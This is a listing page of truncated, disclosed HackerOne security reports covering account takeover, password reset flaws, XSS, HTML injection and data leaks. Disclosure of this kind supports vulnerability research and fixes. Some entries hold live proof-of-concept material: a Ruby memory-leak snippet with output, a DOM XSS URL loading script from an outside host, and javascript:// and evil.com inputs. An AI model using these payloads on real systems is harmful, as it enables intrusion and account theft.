HackerOne Reports
Search through disclosed security reports
10,350 reports found
Showing 681 - 700
This bug was reported directly to GitHub Security Lab.
## Summary: I've found that I can Bypass Email verification from the leaked verification token at `/api/v1/user/breaches` At `monitor.mozilla.org` ## Steps To Reproduce: 1. Add email address for monitoring 1. it needs Email verification from the email owner 1. Go to `/api/v1/user/breaches` , you'll find the whole data for the …
**Description:** During my search in this domain I found it vulnerable to CSRF so I tried to escalate it to Account takeover and I succeeded ## Impact Account takeover via CSRF ## System Host(s) █████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce Vulnerable domain and endpoint …
**Product / URL** https://instagram-brand.com/register/reset/<the security token here>?email=<your email here> **Description and Impact** After a user clicks on the password reset link obtained in inbox, the page for password resetting functionality opens. If you monitor the HTTP Requests that are done while that page is loaded, you will come to know …
**Product / URL** https://en.instagram-brand.com/wp-json/brc/v1/login/ **Description and Impact** An attacker can perform account takeover by leveraging the following two vulnerabilities: Auth Bypass = Username Enumeration + Login Brute Force A. Username Enumeration: ------------------------------- For the site https://en.instagram-brand.com/, it is made sure that a malicious user cannot enumerate usernames of the users by …
**Summary:** For new feature settings, you accept website URLs like javascript:// or data:// in base urls. Even https://evil.com works, this needs to be stripped, this can be used to create another integrations without ### Steps To Reproduce 1. https://hackerone.com/(Team)/integrations/jira/edit 2. Try in Base URL: javascript:// or data:// 3. It will …
Running this snippet can expose arbitrary memory:

```ruby
require 'json'
state = JSON.state.new
state.space = "\0" * 1024
puts JSON.generate({a: :b}, state)
```

```
{"a": psych/handlers/recorder.rb tensi0 reeze) Gem::Specification.new do |s| # to objects of the same type as the original delegate. mydata/scm/git/ruby/dist/lib/ruby/2.5.0/json/ext.rb pass the namP See http://guides.rubygems.org/specification-reference/ for help …
```
Hello Starbucks team, I've discovered DOM XSS on `teavana.com` involving `pr_zip_location` URL parameter. PoC: http://www.teavana.com/us/en/tea/green-tea/winterberry-tea-blend-32601.html?pr_zip_location=//whitehat-hacker.com/xss.j? Works in all major browsers. Vulnerable code is in `full.js`:

```js
var DR = Z(DS) + "/content/" + k(DQ) + "/contents.js";
```

That allows executing absolutely arbitrary JavaScript in the context of the `teavana.com` domain. …
Hi, I found a design issue in the profile statement for the registered user. This is dependent on the end user however. In the profile statement, one can write something, and giving links is allowed as well. This, I think is by design. However, let us suppose the authenticated user creates …
Hi, #Description: Content spoofing, also referred to as content injection or virtual defacement, is an attack targeting a user made possible by an injection vulnerability in a web application. When an application does not properly handle user supplied data, an attacker can supply content to a web application, typically via …
**Summary:** Hi HackerOne Team, Before I reported that email forwarding of private can be enumerated and any user join to private program here #201369 , __but this seems by design__, but now I found a related issue which can cause a security impact on private program because the email …
Calling the native contract (`rskj-core/src/main/java/co/rsk/pcc/NativeContract.java`) with an invalid, large input (1081344 bytes -- I experimentally determined that this is about the slowest I can go) in an infinite loop (until gas runs out) takes about 70 seconds on my machine (I assume ~23 seconds on your machine). (Slightly faster than …
A vulnerability in xvideos.com allows an attacker to register using victim email addresses which are unverified. This can be further exploited to enable two-factor authentication (2FA), permanently locking the victim out of their own email account. This results in a denial-of-service attack against the legitimate email owner. Steps to Reproduce: …
## Summary: [summary of the vulnerability] A heap use after free (or assertion) can be triggered if some allocations fail. I am not sure you consider allocation failures to be part of security issues, and I am not sure the issue lies in curl or in openssl, but I still …
## Description Hi team, I found an interesting flaw in your password recovery mechanism that can give the ability to reset password without a valid token and knowing current password. I'm going to explain it here: In https://www.twitterflightschool.com/ domain if you try to reset your password from https://www.twitterflightschool.com/student/authentication/request_password_reset you'll get …
## Summary: An HTML injection vulnerability exists in the packing slip generator, allowing customers to alter the logistical process of their and others' orders for shops that choose to display the user's e-mail address on the packing slip. The success rate depends on the shop's setup and can result in …
**Summary** While performing recon work on websites owned by DoD I came up with ██████████ website which is leaking sensitive information. **Description** The above website is leaking information such as- first name and last name, email address, phone number, house address and organization name of attendees in a clear readable …